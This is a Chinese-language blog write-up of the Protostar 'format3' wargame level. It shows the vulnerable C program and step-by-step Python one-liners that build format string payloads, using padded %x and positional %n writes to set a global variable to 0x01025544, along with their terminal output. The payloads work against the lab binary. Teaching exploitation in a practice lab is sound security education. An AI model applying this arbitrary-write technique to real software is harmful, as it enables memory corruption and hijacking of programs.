温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Protostar format3

发布时间:2020-07-10 20:45:24 来源:网络 阅读:815 作者:terrying 栏目:安全技术

About

This level advances from format2 and shows how to write more than 1 or 2 bytes of memory to the process. This also teaches you to carefully control what data is being written to the process memory.
This level is at /opt/protostar/bin/format3

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void printbuffer(char *string)
{
                printf(string);
}

void vuln()
{
                char buffer[512];
                fgets(buffer, sizeof(buffer), stdin);
                printbuffer(buffer);

                if(target == 0x01025544) {
                                printf("you have modified the target :)\n");
                } else {
                                printf("target is %08x :(\n", target);
                }
}

int main(int argc, char **argv)
{
                vuln();
}

这题与上看上去是不是很像?具体看看有两个不同的地方:1、是printbuffer替换了printf;2、是target的值换为0x01025544

同理,按上一题的做法试试,修改%x的长度,结果是可以的,结果字符串太长,等到我都睡着了。。。
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08%232x%232x%3333x%x%x%x%x%x%x%x%16926279x%n"' | ./format3
<...>
                                                                                                                                                                                                                 bffff614
you have modified the target :)

很明显,这样的做法不是题目的本意。由于本人掌握知识有限,即使答案摆在眼前也搞不明白。。。直到,看了本书《***之道:漏洞发掘的艺术》才恍然大悟,如果有人看不懂解答的话也强烈推荐看看这本书!!

以下说明均以阅读过《***之道:漏洞发掘的艺术》相关章节为基础,至于原理性不做太多解释,有空再专门写一篇文章解释解释 。。。

这题的难点也就是通过%n来修改target的值,从上一题的解法可以掌握的是可以通过%nx来掌握不算大的长度,因此对0x01025544通过拆分来完成,具体做法如下:
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%x."*12' | ./format3
     0.bffff5e0.b7fd7ff4.0.0.bffff7e8.804849d.bffff5e0.200.b7fd8420.bffff624.80496f4.
target is 00000000 :(
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%11$x%12$n"' | ./format3
     bffff624
target is 00000014 :(
user@protostar:/opt/protostar/bin$ python -c 'print 0x44-(0x14-0x8)'
56
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%11$56x%12$n"' | ./format3
                                                                                                     bffff624
target is 00000044 :(

瞧,现在已经得到低字节已经是44了,接下来按同一个思路往下做就是了。

user@protostar:/opt/protostar/bin$ python -c 'print 0x55-0x44'
17
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%11$56x%12$n"+"%12$17x%13$n"' | ./format3
                                                                                                     bffff624                    80496f4
target is 00005544 :(
user@protostar:/opt/protostar/bin$ python -c 'print 0x102-0x55'
173
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%11$56x%12$n"+"%12$17x%13$n"+"%13$173x%14$n"' | ./format3
                                                                                                     bffff624                    80496f4                                                                                                                                                                                                                                                                                                                                            80496f5
you have modified the target :)


向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI